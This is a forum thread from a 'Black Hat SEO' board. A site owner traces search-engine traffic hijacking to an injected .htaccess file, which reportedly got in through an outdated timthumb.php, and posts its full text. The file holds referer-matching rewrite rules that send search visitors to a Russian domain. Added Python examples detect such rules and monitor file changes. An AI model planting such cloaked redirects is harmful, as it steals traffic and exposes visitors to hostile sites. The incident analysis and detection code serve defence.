
WTF all traffic from G gets redirected??

Discussion in 'Black Hat SEO' started by supahsmooth, Jan 24, 2012.

  1. supahsmooth

    supahsmooth Junior Member

    Hi guys, I kind of badly need your help.

    Here is my problem:
    I run a site called asusrecovery.com. Pulling lots of traffic from G. I think my site got hijacked by the Russian mob or something :p, because if you click on a Google result of my site you get redirected to http://looklocation.ru/vis/index.php which doesn't make sense. I think somebody is trying to steal my traffic.

    You can try it by searching for "asus recovery" and click my website.

    Please please help me because it is my only source of income. I will explain my method if somebody helps ;)

    Thanks in advance!
     
  2. nikao

    nikao Power Member

    It's not just from Google, I get redirected to it when I'm typing it in as well.
    Did you check your .htaccess file? Perhaps the vdomain settings in Apache? DNS servers?
     
  3. supahsmooth

    supahsmooth Junior Member

    Thanks for your reply!

    There is not a single trace in the .htaccess files. The weird thing is that I can still access my host and all my WordPress installations. Do you think it is hacked?
     
  4. DamageX

    DamageX Elite Member

    Thou hath been fucked.

    Submit a support ticket and notify your host of this, they should be able to find the hole and patch it.

    Oh and if you're on a shared server, it's not excluded that they gained access to your site(s) by hacking someone else's account. So the whole server may be compromised.
     
  5. innozemec

    innozemec Jr. VIP Jr. VIP

    Probably you got your WP injected with some malware that's adding a redirect to that site. Check your site's output source code for suspicious code.
     
  6. DamageX

    DamageX Elite Member

    I checked that for him, first thing I did. Found no iframe or suspicious js.
     
  7. paulcarter97

    paulcarter97 Regular Member

    Probably someone messing with your site. Change your .htaccess (it is hidden) to the original copy of WordPress.
     
  8. supahsmooth

    supahsmooth Junior Member

    Thanks so much for all the replies, BHW rocks!

    I am contacting HG support now and I will share the results. I am on a shared server so it is possible.

    I also noticed that all my websites have the same problem (about 40), so it is probably not the WP malware injection as some of my sites are raw html.
     
  9. dayomoto

    dayomoto Junior Member

    your site loads fine for me
     
  10. supahsmooth

    supahsmooth Junior Member

    The problem is only occurring when you visit asusrecovery.com via G**gle by searching "asus recovery" (#2 in the results I think)
     
  11. _Biju_

    _Biju_ Junior Member

    It's clearly a "virus" or code injection or whatever it's called. Search for the "eval" command in your PHP files. I can take a look if you want me to, but it's usually in your active theme folder if you're using WordPress, and usually at the bottom of the file.
     
  12. supahsmooth

    supahsmooth Junior Member

    Found the problem thanks to you guys! It is a .htaccess file in the root of my host. It does mean that the host is compromised.

    Code:
    <IfModule mod_rewrite.c>
    
    RewriteEngine On	
    
    RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
    
    RewriteRule ^(.*)$ http://looklocation.ru/vis/index.php [R=301,L]
    
    RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
    
    RewriteRule ^(.*)$ http://looklocation.ru/vis/index.php [R=301,L]
    
    </IfModule>
    I contacted support and they are going to fix the hole.

    Thanks for the support!
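
Added example, not part of the thread: a Python check for the pattern in the file quoted above, where `RewriteCond` lines on `%{HTTP_REFERER}` guard a `RewriteRule` whose target is an external host, plus a small simulation showing that only requests with a matching Referer are redirected. The sample is constructed (shortened engine list, placeholder host `example.invalid`), and the parser assumes conditions are ANDed and ignores `[OR]` and non-Referer conditions.

```python
import re
from urllib.parse import urlparse

# Constructed sample shaped like the injected file quoted above, with the
# engine list shortened and a placeholder target host (example.invalid).
SAMPLE = r"""
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|yahoo|bing)\.(.*)
RewriteRule ^(.*)$ http://example.invalid/vis/index.php [R=301,L]
</IfModule>
"""

def parse_rules(text):
    """Return [(referer_regexes, target, flags)], one entry per RewriteRule."""
    rules, conds = [], []
    for raw in text.splitlines():
        parts = raw.split()
        if len(parts) < 3:
            continue
        directive = parts[0].lower()
        flags = parts[3].upper() if len(parts) > 3 else ""
        if directive == "rewritecond" and parts[1].upper() == "%{HTTP_REFERER}":
            conds.append(re.compile(parts[2], re.I if "NC" in flags else 0))
        elif directive == "rewriterule":
            rules.append((conds, parts[2], flags))
            conds = []  # conditions bind only to the next rule
    return rules

def referer_redirects(text):
    """Flag rules that send visitors to another host only for some Referers."""
    findings = []
    for conds, target, flags in parse_rules(text):
        host = urlparse(target).hostname  # None for internal rewrites
        if conds and host:
            findings.append({"host": host, "target": target, "flags": flags})
    return findings

def simulate(text, referer):
    """Return the redirect target for a request carrying this Referer."""
    for conds, target, _flags in parse_rules(text):
        if conds and all(c.search(referer) for c in conds):
            return target
    return None
```

Run `referer_redirects()` over every `.htaccess` from the account root downward, not only the ones inside each site's directory, since Apache applies the files of parent directories too.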
     
  13. wanfirdaus

    wanfirdaus Regular Member

  14. capripio

    capripio Regular Member

    Dude, remove this file and your problem gets solved!
     
  15. supahsmooth

    supahsmooth Junior Member

    Yes I know. I had to leave it as is so that the technical people of HG could trace the hole and fix it ;). Thanks for the heads up though.

     
  16. DamageX

    DamageX Elite Member

    Problem is... If you're on a shared server then it rarely matters if YOU keep your scripts up-to-date and secured. There's always some other guy on the server who forgets to update his.
     
  17. gmsniperx

    gmsniperx Jr. VIP Jr. VIP

    I am also having the same problem!

    The .htaccess files on my domains also look like this, but the redirection is towards h++p://look-location.ru/vis/index.php

    I have asked my hosting provider to look into the matter.

    Can someone help me out please?
     
  18. orlandolongwood

    orlandolongwood Junior Member

    Friends,

    First, let's all move our shared hosting sites to companies that take security seriously. I vote for HostGator because they do; also a senior support tech is my next-door neighbor and I have a can of air horn and am not afraid to use it at 3 AM.

    Next, let's all secure our hosting environment AND our .htaccess file. CHMOD 644, thank you.

    Your password needs to be in Swahili, Latin, or Middle English. Fix it now.

    Finally, implement a script similar to:

    Code:
    http://www.premierwebsitesolutions.com/scripts/monitor/PWSmonitorchanges.txt
    Don't know how to do this? Get on Craigslist and find a local (within driving distance) resource that knows this.
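
Added example, not part of the thread and not the script linked above: a minimal change monitor in Python for the two checks this post asks for. It baselines a SHA-256 hash for every `.htaccess` under a root directory, then reports files that were added, changed or removed, and flags any that are group- or world-writable (looser than 644). The directory layout in `demo()` is constructed.

```python
import hashlib
import os
import stat
import tempfile

def snapshot(root, names=(".htaccess",)):
    """Map each watched file under root to (sha256 hex digest, mode bits)."""
    state = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in set(files) & set(names):
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            mode = stat.S_IMODE(os.stat(path).st_mode)
            state[os.path.relpath(path, root)] = (digest, mode)
    return state

def compare(baseline, current):
    """Report what changed since the baseline and which files are writable."""
    report = {"added": [], "changed": [], "writable": []}
    for path, (digest, mode) in sorted(current.items()):
        if path not in baseline:
            report["added"].append(path)
        elif baseline[path][0] != digest:
            report["changed"].append(path)
        if mode & 0o022:  # group- or world-writable, i.e. looser than 644
            report["writable"].append(path)
    report["removed"] = sorted(set(baseline) - set(current))
    return report

def demo():
    """Constructed walk-through in a temporary directory."""
    with tempfile.TemporaryDirectory() as root:
        site = os.path.join(root, "site1")
        os.makedirs(site)
        known = os.path.join(site, ".htaccess")
        with open(known, "w") as fh:
            fh.write("RewriteEngine On\n")
        os.chmod(known, 0o644)
        baseline = snapshot(root)
        # Simulate the incident: a new file in the account root and an edit.
        planted = os.path.join(root, ".htaccess")
        with open(planted, "w") as fh:
            fh.write("RewriteEngine On\n# unexpected rules\n")
        os.chmod(planted, 0o666)
        with open(known, "a") as fh:
            fh.write("# edited\n")
        return compare(baseline, snapshot(root))
```

Store the baseline somewhere the web server account cannot write to, otherwise whoever alters the `.htaccess` can update the baseline as well.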
     
  19. nipunn12

    nipunn12 Regular Member

    It's fixed now. Checked from google.ae
     
  20. supahsmooth

    supahsmooth Junior Member

    Small update. HG staff fixed it right away. It took them about 4 hours from my notification until solving the problem. So that is quite quick. They say it was caused by an outdated version of timthumb.php.